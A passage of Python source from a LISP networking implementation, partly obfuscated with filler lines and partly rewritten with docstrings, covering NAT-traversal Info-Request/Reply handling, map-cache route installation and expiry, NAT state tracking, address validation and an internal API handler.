        if 6 - 6: OoO0O00 + OoO0O00 * OOooOOo / IiII % ooOoO0o - I1IiiI
        if 17 - 17: II111iiii
        if 66 - 66: O0 % OoOoOO00 + IiII % I1Ii111
        if 94 - 94: OoOoOO00 / OoooooooOO % Ii1I * i11iIiiIii
        if 95 - 95: iIii1I11I1II1 % OOooOOo % O0
        if 93 - 93: I1ii11iIi11i
        # A host route from a previous (data-port) request may still be
        # installed; poll briefly until it is gone before the
        # control-port request goes out.
        if (port == LISP_CTRL_PORT and OOo000oo != None):
            while (True):
                time.sleep(.01)
                OOo000oo = lisp_get_host_route_next_hop(oo0o00OO)
                if (OOo000oo == None): break
        if 61 - 61: o0oOOo0O0Ooo * ooOoO0o
        if 82 - 82: O0 * O0 % I1IiiI / o0oOOo0O0Ooo
        if 46 - 46: IiII . O0 . I11i % I1ii11iIi11i * oO0o - oO0o
        ooooO0OO0 = lisp_get_default_route_next_hops()
        for OoO0o0OOOO, iiIIII1I1ii in ooooO0OO0:
            if (OoO0o0OOOO != device_name): continue
            if 90 - 90: OoooooooOO . Oo0Ooo + IiII + I1IiiI * I1Ii111
            if 82 - 82: OOooOOo / I11i % Ii1I * OoOoOO00
            if 88 - 88: o0oOOo0O0Ooo % OoO0O00
            if 30 - 30: II111iiii / Oo0Ooo % Oo0Ooo + O0 / iIii1I11I1II1 . OoO0O00
            if 43 - 43: I1IiiI % OoOoOO00 * O0 + o0oOOo0O0Ooo
            if 97 - 97: iIii1I11I1II1 + O0
            # Point the host route at this device's next-hop, replacing
            # any existing host route first.
            if (OOo000oo != iiIIII1I1ii):
                if (OOo000oo != None):
                    lisp_install_host_route(oo0o00OO, OOo000oo, False)
                if 41 - 41: OoOoOO00 - II111iiii
                lisp_install_host_route(oo0o00OO, iiIIII1I1ii, True)
                OOO0OOoo0o = True
            if 46 - 46: OOooOOo
            break
    if 73 - 73: iII111i - IiII + II111iiii
    if 58 - 58: Oo0Ooo % I1IiiI
    if 78 - 78: iII111i / iIii1I11I1II1 * IiII . ooOoO0o / I1Ii111 % I11i
    if 14 - 14: II111iiii % iIii1I11I1II1 - I1IiiI % i11iIiiIii . OOooOOo * I1ii11iIi11i
    if 12 - 12: I1ii11iIi11i % I1ii11iIi11i . OoO0O00 . OoOoOO00
    if 73 - 73: I1ii11iIi11i * i1IIi * Oo0Ooo / O0
    IIii1i = OO0O0OOooo.encode()
    OO0O0OOooo.print_info()
    if 1 - 1: iII111i * OOooOOo + II111iiii / Ii1I . I1ii11iIi11i
    if 61 - 61: oO0o % OoOoOO00 % ooOoO0o . I1Ii111 / OoO0O00
    if 21 - 21: IiII
    if 15 - 15: OoOoOO00 % O0 - OOooOOo - oO0o . iII111i . OoO0O00
    ooO0oO0o0O0o = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
    ooO0oO0o0O0o = bold(ooO0oO0o0O0o, False)
    III1I1Iii1 = bold("{}".format(port), False)
    OO0o = red(oo0o00OO, False)
    ooOoOo0O = "RTR " if port == LISP_DATA_PORT else "MS "
    lprint("Send Info-Request to {}{}, port {} {}".format(ooOoOo0O, OO0o,
        III1I1Iii1, ooO0oO0o0O0o))
    if 9 - 9: I11i + I1ii11iIi11i / I1IiiI + I1Ii111 % i1IIi / i1IIi
    if 91 - 91: I11i
    if 94 - 94: OoO0O00
    if 19 - 19: I11i * i11iIiiIii - OoO0O00 / ooOoO0o * I1Ii111 + OoO0O00
    if 30 - 30: Ii1I / iII111i * Ii1I
    if 11 - 11: OoOoOO00 - OoOoOO00 % oO0o
    # Control port: send as-is. Data port: prepend a LISP data header
    # with instance-id 0xffffff so the request takes the data path
    # through any NAT.
    if (port == LISP_CTRL_PORT):
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, IIii1i)
    else:
        Ii1I1i1IiiI = lisp_data_header()
        Ii1I1i1IiiI.instance_id(0xffffff)
        Ii1I1i1IiiI = Ii1I1i1IiiI.encode()
        if (Ii1I1i1IiiI):
            IIii1i = Ii1I1i1IiiI + IIii1i
            if 3 - 3: I1IiiI - OoooooooOO % iIii1I11I1II1 + I1Ii111 + OoOoOO00
            if 71 - 71: i1IIi % O0 % ooOoO0o
            if 24 - 24: O0
            if 88 - 88: OoooooooOO / Oo0Ooo / oO0o
            if 99 - 99: I1Ii111 % OoOoOO00 % IiII - Ii1I
            if 79 - 79: ooOoO0o + Oo0Ooo
            if 80 - 80: OoOoOO00 % OoO0O00 . OoO0O00 * OoO0O00 * O0
            if 18 - 18: II111iiii . o0oOOo0O0Ooo + OoO0O00
            if 69 - 69: OoO0O00 . ooOoO0o * ooOoO0o * iIii1I11I1II1
            lisp_send(lisp_sockets, dest, LISP_DATA_PORT, IIii1i)
    if 8 - 8: iII111i . oO0o . OOooOOo + iII111i . Ii1I
    if 46 - 46: OoO0O00
    if 21 - 21: iIii1I11I1II1 - iII111i
    if 15 - 15: O0 + iII111i + i11iIiiIii
    if 31 - 31: iIii1I11I1II1 * iIii1I11I1II1 . I11i
    if 52 - 52: i11iIiiIii / oO0o / IiII
    if 84 - 84: I11i . oO0o + ooOoO0o
    # Undo the temporary host route and restore the saved next-hop.
    if (OOO0OOoo0o):
        lisp_install_host_route(oo0o00OO, None, False)
        if (OOo000oo != None): lisp_install_host_route(oo0o00OO, OOo000oo, True)
    if 75 - 75: I1Ii111
    return
if 97 - 97: ooOoO0o % Oo0Ooo . o0oOOo0O0Ooo
if 22 - 22: O0 % I11i + OoO0O00 - iII111i + I1IiiI . O0
if 73 - 73: ooOoO0o + O0 - I11i . I1IiiI + OOooOOo
if 36 - 36: I11i % OoO0O00 * OoOoOO00 - I1Ii111
if 16 - 16: ooOoO0o % OOooOOo . OoO0O00 % II111iiii . iIii1I11I1II1
if 21 - 21: oO0o + II111iiii / OoOoOO00 * I11i
if 90 - 90: OoOoOO00 % OoOoOO00 + I11i
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
    """Parse a received Info-Request, answer it with an Info-Reply, and
    remember the requester as an info-source.

    lisp_sockets -- sockets used to transmit the reply
    packet       -- Info-Request payload to decode
    addr_str     -- source address of the request, as a string
    sport        -- source UDP port of the request (the ETR's NAT port)
    rtr_list     -- optional RTR address list to advertise in the reply
    """

    #
    # Parse the Info-Request. Bail out when it does not decode.
    #
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return
    info.print_info()

    #
    # Turn the request into a reply. The global ETR RLOC and port are the
    # NAT-translated address/port the request arrived from.
    #
    info.info_reply = True
    info.global_etr_rloc.store_address(addr_str)
    info.etr_port = sport

    #
    # When the requester supplied a hostname, echo it back as a
    # distinguished-name private RLOC.
    #
    if (info.hostname != None):
        info.private_etr_rloc.afi = LISP_AFI_NAME
        info.private_etr_rloc.store_address(info.hostname)

    if (rtr_list != None): info.rtr_list = rtr_list
    packet = info.encode()
    info.print_info()

    #
    # Send the Info-Reply back to the same address and port.
    #
    lprint("Send Info-Reply to {}".format(red(addr_str, False)))
    dest = lisp_convert_4to6(addr_str)
    lisp_send(lisp_sockets, dest, sport, packet)

    #
    # Cache the info-source so later control messages can be associated
    # with this requester.
    #
    info_source = lisp_info_source(info.hostname, addr_str, sport)
    info_source.cache_address_for_info_source()
    return
def lisp_get_signature_eid():
    """Return the first database-mapping entry flagged with a
    signature-EID, or None when no such entry is configured.
    """
    candidates = (entry for entry in lisp_db_list if entry.signature_eid)
    return(next(candidates, None))
def lisp_get_any_translated_port():
    """Return the NAT-translated port of the first database-mapping RLOC
    that has a translated RLOC stored, or None when none do.
    """
    for db_entry in lisp_db_list:
        for rloc_entry in db_entry.rloc_set:
            # Only RLOCs with a stored translation qualify.
            if (rloc_entry.translated_rloc.is_null() == False):
                return(rloc_entry.translated_port)
    return(None)
def lisp_get_any_translated_rloc():
    """Return the NAT-translated RLOC of the first database-mapping RLOC
    entry that has one stored, or None when none do.
    """
    for db_entry in lisp_db_list:
        for rloc_entry in db_entry.rloc_set:
            # Only RLOCs with a stored translation qualify.
            if (rloc_entry.translated_rloc.is_null() == False):
                return(rloc_entry.translated_rloc)
    return(None)
def lisp_get_all_translated_rlocs():
    """Return a list of address strings, one per NAT-translated RLOC
    found across all database-mappings.
    """
    addresses = [
        rloc_entry.translated_rloc.print_address_no_iid()
        for db_entry in lisp_db_list
        for rloc_entry in db_entry.rloc_set
        if rloc_entry.is_rloc_translated()
    ]
    return(addresses)
def lisp_update_default_routes(map_resolver, iid, rtr_list):
    """Install or refresh default map-cache entries (unicast and
    multicast) for instance-ID 'iid', pointing at the supplied RTR set.

    map_resolver -- where the RTR info came from (stored as mapping source)
    rtr_list     -- dict of RTR address-string -> lisp_address
    """
    behind_nat = (os.getenv("LISP_RTR_BEHIND_NAT") != None)

    #
    # When this system is configured as behind a NAT, drop private RTR
    # addresses from consideration.
    #
    usable_rtrs = {}
    for rtr_key in rtr_list:
        if (rtr_key == None): continue
        rtr_address = rtr_list[rtr_key]
        if (behind_nat and rtr_address.is_private_address()): continue
        usable_rtrs[rtr_key] = rtr_address
    rtr_list = usable_rtrs

    eid_pairs = []
    for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
        # MAC default only applies when the L2-overlay feature is on.
        if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break

        #
        # Unicast default route. Remove any stale cache entry unless its
        # RLOC-set already matches the new RTR set.
        #
        unicast_eid = lisp_address(afi, "", 0, iid)
        unicast_eid.make_default_route(unicast_eid)
        entry = lisp_map_cache.lookup_cache(unicast_eid, True)
        if (entry):
            if (entry.checkpoint_entry):
                lprint("Updating checkpoint entry for {}".format(green(entry.print_eid_tuple(), False)))
            elif (entry.do_rloc_sets_match(rtr_list.values())):
                continue
            entry.delete_cache()
        eid_pairs.append([unicast_eid, ""])

        #
        # Multicast default route; the (S,G) state lives in a per-source
        # cache hanging off the group entry.
        #
        mcast_eid = lisp_address(afi, "", 0, iid)
        mcast_eid.make_default_multicast_route(mcast_eid)
        mcast_entry = lisp_map_cache.lookup_cache(mcast_eid, True)
        if (mcast_entry): mcast_entry = mcast_entry.source_cache.lookup_cache(unicast_eid, True)
        if (mcast_entry): mcast_entry.delete_cache()
        eid_pairs.append([unicast_eid, mcast_eid])

    if (len(eid_pairs) == 0): return

    #
    # Build the RTR RLOC-set advertised in every default mapping.
    #
    rtr_rloc_set = []
    for rtr_key in rtr_list:
        rtr_address = rtr_list[rtr_key]
        rloc_entry = lisp_rloc()
        rloc_entry.rloc.copy_address(rtr_address)
        rloc_entry.priority = 254
        rloc_entry.mpriority = 255
        rloc_entry.rloc_name = "RTR"
        rtr_rloc_set.append(rloc_entry)

    #
    # Add one mapping per (eid, group) pair. Deep-copy the RLOC-set after
    # each add so mappings do not share mutable RLOC state.
    #
    for eid_pair in eid_pairs:
        mapping = lisp_mapping(eid_pair[0], eid_pair[1], rtr_rloc_set)
        mapping.mapping_source = map_resolver
        mapping.map_cache_ttl = LISP_MR_TTL * 60
        mapping.add_cache()
        lprint("Add {} to map-cache with RTR RLOC-set: {}".format(green(mapping.print_eid_tuple(), False), rtr_list.keys()))
        rtr_rloc_set = copy.deepcopy(rtr_rloc_set)
    return
def lisp_process_info_reply(source, packet, store):
    """Process a received Info-Reply.

    source -- address the reply came from
    packet -- Info-Reply payload to decode
    store  -- when True, store discovered NAT translations into the
              matching database-mapping RLOC entries

    Returns [global-etr-rloc, translated-port, new-rtr-flag]; the first
    two are None when the packet fails to decode.
    """

    #
    # Parse the Info-Reply.
    #
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return([None, None, False])

    info.print_info()

    #
    # Merge advertised RTRs into the global RTR list, tracking whether any
    # previously-unknown RTR appeared.
    #
    new_rtr = False
    for rtr in info.rtr_list:
        rtr_str = rtr.print_address_no_iid()
        if (rtr_str in lisp_rtr_list):
            if (lisp_register_all_rtrs == False): continue
            if (lisp_rtr_list[rtr_str] != None): continue
        new_rtr = True
        lisp_rtr_list[rtr_str] = rtr

    #
    # An ITR refreshes its default map-cache entries through the RTR set,
    # once per configured instance-ID.
    #
    if (lisp_i_am_itr and new_rtr):
        if (lisp_iid_to_interface == {}):
            lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
        else:
            for iid in lisp_iid_to_interface.keys():
                lisp_update_default_routes(source, int(iid), lisp_rtr_list)

    #
    # Caller only wants the discovered translation returned.
    #
    if (store == False):
        return([info.global_etr_rloc, info.etr_port, new_rtr])

    #
    # Store translated RLOC and port in each matching database-mapping
    # RLOC entry.
    #
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            rloc = rloc_entry.rloc
            interface = rloc_entry.interface
            if (interface == None):
                # Address-configured RLOC: must be a local address and, when
                # a private RLOC was echoed back, must match it exactly.
                if (rloc.is_null()): continue
                if (rloc.is_local() == False): continue
                if (info.private_etr_rloc.is_null() == False and
                    rloc.is_exact_match(info.private_etr_rloc) == False):
                    continue

            elif (info.private_etr_rloc.is_dist_name()):
                # Interface RLOC matched by distinguished-name.
                rloc_name = info.private_etr_rloc.address
                if (rloc_name != rloc_entry.rloc_name): continue

            eid_str = green(db.eid.print_prefix(), False)
            rloc_str = red(rloc.print_address_no_iid(), False)

            # Same global address with no stored port means no NAT between
            # us and the Map-Server.
            same_global = info.global_etr_rloc.is_exact_match(rloc)
            if (rloc_entry.translated_port == 0 and same_global):
                lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
                    interface, eid_str))
                continue

            #
            # Nothing to do when the stored translation is unchanged.
            #
            global_rloc = info.global_etr_rloc
            stored_rloc = rloc_entry.translated_rloc
            if (stored_rloc.is_exact_match(global_rloc) and
                info.etr_port == rloc_entry.translated_port): continue

            lprint("Store translation {}:{} for {} ({}), EID-prefix {}".format(red(info.global_etr_rloc.print_address_no_iid(), False),
                info.etr_port, rloc_str, interface, eid_str))

            rloc_entry.store_translated_rloc(info.global_etr_rloc,
                info.etr_port)

    return([info.global_etr_rloc, info.etr_port, new_rtr])
def lisp_test_mr ( lisp_sockets , port ) :
    #
    # Periodic Map-Resolver test: sends Map-Requests for fixed IPv4/IPv6
    # test EIDs and re-arms itself on a threading.Timer.
    #
    # NOTE(review): deliberately disabled -- the bare "return" below makes
    # everything after it unreachable dead code. Remove it to re-enable.
    #
    return
    lprint ( "Test Map-Resolvers" )
    if 86 - 86: oO0o * Oo0Ooo / OOooOOo
    # (dead code) Build one IPv4 and one IPv6 scratch address.
    OOo0O0O0o0 = lisp_address ( LISP_AFI_IPV4 , "" , 0 , 0 )
    ii1i1Ii1 = lisp_address ( LISP_AFI_IPV6 , "" , 0 , 0 )
    if 7 - 7: I1Ii111 + ooOoO0o % o0oOOo0O0Ooo
    if 53 - 53: i1IIi / iII111i % Ii1I % OoooooooOO
    if 63 - 63: OOooOOo + I1ii11iIi11i . i1IIi . Ii1I - I1ii11iIi11i * o0oOOo0O0Ooo
    if 79 - 79: ooOoO0o - O0
    # (dead code) Send Map-Requests for two IPv4 test addresses.
    OOo0O0O0o0 . store_address ( "10.0.0.1" )
    lisp_send_map_request ( lisp_sockets , port , None , OOo0O0O0o0 , None )
    OOo0O0O0o0 . store_address ( "192.168.0.1" )
    lisp_send_map_request ( lisp_sockets , port , None , OOo0O0O0o0 , None )
    if 20 - 20: OOooOOo
    if 22 - 22: iIii1I11I1II1 / I1Ii111
    if 6 - 6: iII111i . i11iIiiIii / Oo0Ooo
    if 86 - 86: I11i % I1Ii111 % oO0o - ooOoO0o / i1IIi
    # (dead code) Send Map-Requests for two IPv6 test addresses.
    ii1i1Ii1 . store_address ( "0100::1" )
    lisp_send_map_request ( lisp_sockets , port , None , ii1i1Ii1 , None )
    ii1i1Ii1 . store_address ( "8000::1" )
    lisp_send_map_request ( lisp_sockets , port , None , ii1i1Ii1 , None )
    if 68 - 68: i1IIi % O0 % iII111i
    if 55 - 55: I1ii11iIi11i % OOooOOo - o0oOOo0O0Ooo - II111iiii
    if 52 - 52: I1Ii111
    if 34 - 34: II111iiii + iII111i / IiII
    # (dead code) Re-arm the periodic test timer.
    iIIiIi = threading . Timer ( LISP_TEST_MR_INTERVAL , lisp_test_mr ,
        [ lisp_sockets , port ] )
    iIIiIi . start ( )
    return
def lisp_update_local_rloc(rloc):
    """Refresh an interface-bound RLOC with the interface's current
    address.

    Does nothing when the RLOC has no interface binding, when the
    interface has no address, or when the address is unchanged. On a
    change, also records the new address in the global lisp_myrlocs[0].
    """
    if (rloc.interface == None): return

    address = lisp_get_interface_address(rloc.interface)
    if (address == None): return

    old_addr = rloc.rloc.print_address_no_iid()
    new_addr = address.print_address_no_iid()
    if (old_addr == new_addr): return

    lprint("Local interface address changed on {} from {} to {}".format(rloc.interface, old_addr, new_addr))

    rloc.rloc.copy_address(address)
    lisp_myrlocs[0] = address
    return
def lisp_update_encap_port(mc):
    """Walk a map-cache entry's RLOC-set and refresh each RLOC's
    translated (encapsulation) port from current NAT state.
    """
    for rloc_entry in mc.rloc_set:
        nat_info = lisp_get_nat_info(rloc_entry.rloc, rloc_entry.rloc_name)
        if (nat_info == None): continue
        if (rloc_entry.translated_port == nat_info.port): continue

        lprint(("Encap-port changed from {} to {} for RLOC {}, " + "EID-prefix {}").format(rloc_entry.translated_port, nat_info.port,
            red(rloc_entry.rloc.print_address_no_iid(), False),
            green(mc.print_eid_tuple(), False)))

        rloc_entry.store_translated_rloc(rloc_entry.rloc, nat_info.port)
    return
def lisp_timeout_map_cache_entry(mc, delete_list):
    """Age one map-cache entry; append it to delete_list when its TTL has
    expired. Always returns [True, delete_list] so cache walks continue.
    """

    #
    # Entries with no TTL never expire; just keep their encap-port fresh.
    #
    if (mc.map_cache_ttl == None):
        lisp_update_encap_port(mc)
        return([True, delete_list])

    now = lisp_get_timestamp()

    #
    # Not expired yet. Refresh encap-port for forwarding entries only
    # (ones with no negative action).
    #
    if (mc.last_refresh_time + mc.map_cache_ttl > now):
        if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
        return([True, delete_list])

    #
    # In NAT-traversal mode the default (0/0) entry is kept alive.
    #
    if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
        return([True, delete_list])

    #
    # Expired -- log it and queue it for deletion by the caller.
    #
    uptime = lisp_print_elapsed(mc.last_refresh_time)
    eid_str = mc.print_eid_tuple()
    lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}".format(green(eid_str, False), bold("timed out", False), uptime))

    delete_list.append(mc)
    return([True, delete_list])
def lisp_timeout_map_cache_walk ( mc , parms ) :
    # Callback for lisp_map_cache.walk_cache(): age one entry.
    #
    # parms is a two-element list [delete-list, checkpoint-list]. The
    # delete-list is mutated in place by lisp_timeout_map_cache_entry(),
    # so returning 'parms' below still reflects appended entries.
    # NOTE(review): the checkpoint-list is rebound locally from
    # lisp_write_checkpoint_entry()'s return value; parms[1] only sees the
    # update if that helper mutates and returns the same list object --
    # TODO confirm against lisp_write_checkpoint_entry().
    O0ooo0oO00 = parms [ 0 ]
    O0O0O00ooO0O0 = parms [ 1 ]
    if 65 - 65: iII111i
    if 75 - 75: iIii1I11I1II1 - Oo0Ooo + Ii1I + ooOoO0o
    if 62 - 62: OOooOOo
    if 13 - 13: OOooOOo . i11iIiiIii
    # Unicast (no group) entry: age it, and checkpoint it unless it was
    # just appended to the delete-list (i.e. it is now the list's tail).
    if ( mc . group . is_null ( ) ) :
        O00O00o0O0O , O0ooo0oO00 = lisp_timeout_map_cache_entry ( mc , O0ooo0oO00 )
        if ( O0ooo0oO00 == [ ] or mc != O0ooo0oO00 [ - 1 ] ) :
            O0O0O00ooO0O0 = lisp_write_checkpoint_entry ( O0O0O00ooO0O0 , mc )
        if 71 - 71: oO0o + I1ii11iIi11i * I1ii11iIi11i
        return ( [ O00O00o0O0O , parms ] )
    if 79 - 79: oO0o
    if 47 - 47: OoooooooOO - i1IIi * OOooOOo
    # Group entry: recurse into the per-source cache when one exists.
    if ( mc . source_cache == None ) : return ( [ True , parms ] )
    if 11 - 11: I11i / OOooOOo . o0oOOo0O0Ooo - O0 * OoooooooOO % iII111i
    if 7 - 7: OoOoOO00 . IiII + OoooooooOO - I1Ii111 / oO0o
    if 32 - 32: iIii1I11I1II1 + I11i + OOooOOo - OoooooooOO + i11iIiiIii * o0oOOo0O0Ooo
    if 8 - 8: iII111i
    if 10 - 10: OoOoOO00 % I11i
    parms = mc . source_cache . walk_cache ( lisp_timeout_map_cache_entry , parms )
    return ( [ True , parms ] )
def lisp_timeout_map_cache(lisp_map_cache):
    """Walk the entire map-cache, deleting entries whose TTL has expired
    and writing a checkpoint of the surviving entries.
    """
    state = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, [[], []])

    #
    # Delete expired entries outside the walk, so the radix tree is not
    # modified while being traversed.
    #
    expired_entries, checkpoint_entries = state
    for entry in expired_entries:
        entry.delete_cache()

    #
    # Persist the surviving entries to the checkpoint file.
    #
    lisp_checkpoint(checkpoint_entries)
    return
def lisp_store_nat_info(hostname, rloc, port):
    """Record NAT translation state (address, port) for 'hostname'.

    The newest translation is kept at the head of the per-hostname list.
    Returns True when the head translation is new or changed (caller may
    need to act on it) and False when it merely refreshed the existing
    head entry.
    """
    addr_str = rloc.print_address_no_iid()
    msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
        blue(hostname, False), red(addr_str, False), port)

    new_entry = lisp_nat_info(addr_str, hostname, port)

    # First translation ever seen for this hostname.
    if ((hostname in lisp_nat_state_info) == False):
        lisp_nat_state_info[hostname] = [new_entry]
        lprint(msg.format("Store initial"))
        return(True)

    #
    # Head entry already matches -- just refresh its uptime.
    #
    head = lisp_nat_state_info[hostname][0]
    if (head.address == addr_str and head.port == port):
        head.uptime = lisp_get_timestamp()
        lprint(msg.format("Refresh existing"))
        return(False)

    #
    # Search the rest of the list for a matching old translation.
    #
    found = None
    for entry in lisp_nat_state_info[hostname]:
        if (entry.address == addr_str and entry.port == port):
            found = entry
            break

    if (found == None):
        lprint(msg.format("Store new"))
    else:
        lisp_nat_state_info[hostname].remove(found)
        lprint(msg.format("Use previous"))

    #
    # Move the (fresh) translation to the head of the list.
    #
    remainder = lisp_nat_state_info[hostname]
    lisp_nat_state_info[hostname] = [new_entry] + remainder
    return(True)
def lisp_get_nat_info(rloc, hostname):
    """Return the stored NAT state entry for (hostname, rloc-address), or
    None when no translation is known.
    """
    if ((hostname in lisp_nat_state_info) == False): return(None)

    addr_str = rloc.print_address_no_iid()
    for entry in lisp_nat_state_info[hostname]:
        if (entry.address == addr_str): return(entry)
    return(None)
def lisp_build_info_requests(lisp_sockets, dest, port):
    """Build and send NAT-traversal Info-Requests for every local private
    RLOC, to 'dest' when given, otherwise to all configured
    Map-Resolvers (falling back to Map-Servers).
    """
    if (lisp_nat_traversal == False): return

    #
    # Collect destinations. 'destinations' aliases 'mr_addresses' when we
    # start from the Map-Resolver list, so the DNS refresh test at the
    # bottom also fires when Map-Servers were appended as a fallback.
    #
    mr_addresses = []
    destinations = []
    if (dest == None):
        for mr in lisp_map_resolvers_list.values():
            mr_addresses.append(mr.map_resolver)

        destinations = mr_addresses
        if (destinations == []):
            for ms in lisp_map_servers_list.values():
                destinations.append(ms.map_server)
        if (destinations == []): return
    else:
        destinations.append(dest)

    #
    # Find the private, interface-bound RLOCs from the database-mappings,
    # refreshing each from its interface first. De-dup by address string.
    #
    rloc_addresses = {}
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            lisp_update_local_rloc(rloc_entry)
            if (rloc_entry.rloc.is_null()): continue
            if (rloc_entry.interface == None): continue

            addr = rloc_entry.rloc.print_address_no_iid()
            if (addr in rloc_addresses): continue
            rloc_addresses[addr] = rloc_entry.interface

    if (rloc_addresses == {}):
        lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + "found in any database-mappings")
        return

    #
    # Send one Info-Request per (private RLOC, destination) pair. The
    # device is only pinned when more than one RLOC/interface is in play.
    #
    for addr in rloc_addresses:
        interface = rloc_addresses[addr]
        addr_str = red(addr, False)
        lprint("Build Info-Request for private address {} ({})".format(addr_str,
            interface))
        device = interface if len(rloc_addresses) > 1 else None
        for dest in destinations:
            lisp_send_info_request(lisp_sockets, dest, port, device)

    #
    # Re-resolve Map-Resolver DNS names so address changes are picked up.
    #
    if (mr_addresses != []):
        for mr in lisp_map_resolvers_list.values():
            mr.resolve_dns_name()

    return
def lisp_valid_address_format(kw, value):
    """Syntax-check an address value from a configuration clause.

    kw    -- the keyword being parsed; anything other than "address" is
             accepted unconditionally
    value -- the address text: quoted distinguished-name, IPv4 dotted
             quad, geo-coordinate string, MAC (xxxx-xxxx-xxxx), IPv6, or
             an E.164 "+digits" number

    Returns True when the value matches one of the accepted formats,
    False otherwise.
    """
    if (kw != "address"): return(True)

    #
    # Robustness fix: an empty value used to raise IndexError on the
    # value[0] checks below; treat it as invalid instead.
    #
    if (value == ""): return(False)

    #
    # Quoted distinguished-name. Requires both quotes, so a lone "'"
    # (length 1) is rejected rather than matching its own first/last char.
    #
    if (len(value) >= 2 and value[0] == "'" and value[-1] == "'"): return(True)

    #
    # IPv4: exactly four dot-separated decimal bytes, each <= 255.
    #
    if (value.find(".") != -1):
        fields = value.split(".")
        if (len(fields) != 4): return(False)

        for byte in fields:
            if (byte.isdigit() == False): return(False)
            if (int(byte) > 255): return(False)
        return(True)

    #
    # Geo-coordinates: dash-separated with a compass direction letter and
    # at least 8 fields (d-m-s-N/S-d-m-s-W/E[-altitude]).
    #
    if (value.find("-") != -1):
        fields = value.split("-")
        for direction in ["N", "S", "W", "E"]:
            if (direction in fields):
                if (len(fields) < 8): return(False)
                return(True)

    #
    # MAC address: exactly three dash-separated 16-bit hex fields.
    #
    if (value.find("-") != -1):
        fields = value.split("-")
        if (len(fields) != 3): return(False)

        for halfword in fields:
            try: int(halfword, 16)
            except: return(False)
        return(True)

    #
    # IPv6: colon-separated hex fields; at most one "::" (an empty field
    # is allowed once, or twice only at the very ends).
    #
    if (value.find(":") != -1):
        fields = value.split(":")
        if (len(fields) < 2): return(False)

        seen_null = False
        index = 0
        for halfword in fields:
            index += 1
            if (halfword == ""):
                if (seen_null):
                    if (len(fields) == index): break
                    if (index > 2): return(False)
                seen_null = True
                continue
            try: int(halfword, 16)
            except: return(False)
        return(True)

    #
    # E.164 telephone number: "+" followed by digits only.
    #
    if (value[0] == "+"):
        digits = value[1::]
        for digit in digits:
            if (digit.isdigit() == False): return(False)
        return(True)
    return(False)
def lisp_process_api(process, lisp_socket, data_structure):
    """
    Handle one API request from the lisp-core process. 'data_structure'
    encodes a command name and a JSON parameter string separated by "%".
    The gathered result is JSON-encoded and sent back to "lisp-core"
    over the supplied IPC socket.
    """
    command, parms = data_structure.split("%")

    lprint("Process API request '{}', parameters: '{}'".format(command,
        parms))

    output = []
    if (command == "map-cache"):
        if (parms == ""):
            output = lisp_map_cache.walk_cache(lisp_process_api_map_cache,
                output)
        else:
            output = lisp_process_api_map_cache_entry(json.loads(parms))
    elif (command == "site-cache"):
        if (parms == ""):
            output = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
                output)
        else:
            output = lisp_process_api_site_cache_entry(json.loads(parms))
    elif (command == "map-server"):
        parms = {} if (parms == "") else json.loads(parms)
        output = lisp_process_api_ms_or_mr(True, parms)
    elif (command == "map-resolver"):
        parms = {} if (parms == "") else json.loads(parms)
        output = lisp_process_api_ms_or_mr(False, parms)
    elif (command == "database-mapping"):
        output = lisp_process_api_database_mapping()

    #
    # JSON up the result and return it to the requesting process.
    #
    ipc = lisp_api_ipc(process, json.dumps(output))
    lisp_ipc(ipc, lisp_socket, "lisp-core")
    return
if 24 - 24: O0
if 6 - 6: I1IiiI . i11iIiiIii . OoooooooOO . I1IiiI . o0oOOo0O0Ooo
if 65 - 65: i11iIiiIii
if 46 - 46: i11iIiiIii
if 70 - 70: i1IIi + o0oOOo0O0Ooo
if 44 - 44: iII111i . II111iiii % o0oOOo0O0Ooo
if 29 - 29: i11iIiiIii * i1IIi
def lisp_process_api_map_cache(mc, data):
    """
    Per-entry callback used while walking the map-cache. A unicast entry
    is serialized directly; a multicast (*,G)/(S,G) entry walks its
    source-cache so each source gets its own output row. Returns
    [True, data] so the walk continues.
    """
    if (mc.group.is_null() == False):
        #
        # Multicast entry: serialize each source hanging off the group.
        #
        if (mc.source_cache == None): return([True, data])
        data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
        return([True, data])

    return(lisp_gather_map_cache_data(mc, data))
if 85 - 85: I1Ii111 . IiII + II111iiii
if 92 - 92: iII111i / o0oOOo0O0Ooo * oO0o . I11i % o0oOOo0O0Ooo
if 87 - 87: Ii1I / Oo0Ooo % iIii1I11I1II1 / iII111i
if 42 - 42: OoO0O00 . I1IiiI . OOooOOo + ooOoO0o
if 87 - 87: OOooOOo
if 44 - 44: Oo0Ooo + iIii1I11I1II1
if 67 - 67: iII111i . OOooOOo / ooOoO0o * iIii1I11I1II1
def lisp_gather_map_cache_data(mc, data):
    """
    Serialize one map-cache entry 'mc' into a dictionary and append it
    to list 'data'. Returns [True, data] so cache walks continue.
    """
    entry = {}
    entry["instance-id"] = str(mc.eid.instance_id)
    entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
    if (mc.group.is_null() == False):
        entry["group-prefix"] = mc.group.print_prefix_no_iid()

    entry["uptime"] = lisp_print_elapsed(mc.uptime)
    # NOTE(review): "expires" is derived from mc.uptime, same as "uptime" --
    # preserved as-is; confirm whether an expiry timestamp field was intended.
    entry["expires"] = lisp_print_elapsed(mc.uptime)
    entry["action"] = lisp_map_reply_action_string[mc.action]
    entry["ttl"] = "--" if mc.map_cache_ttl == None else \
        str(mc.map_cache_ttl / 60)

    #
    # Serialize each RLOC of the entry's rloc-set.
    #
    rloc_set = []
    for rloc in mc.rloc_set:
        r = {}
